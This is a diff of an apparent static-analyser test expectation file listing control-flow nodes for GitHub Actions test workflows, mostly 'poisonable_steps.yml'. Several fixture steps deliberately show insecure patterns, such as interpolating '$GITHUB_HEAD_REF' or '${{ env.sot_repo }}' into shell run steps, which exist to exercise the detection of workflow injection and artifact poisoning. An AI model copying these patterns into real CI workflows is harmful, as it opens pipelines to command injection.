.github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| 
.github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | 
.github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| 
.github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | 
.github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | 
.github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| 
echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | 
.github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = 
\\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | 
.github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | 
gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -870,11 +879,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
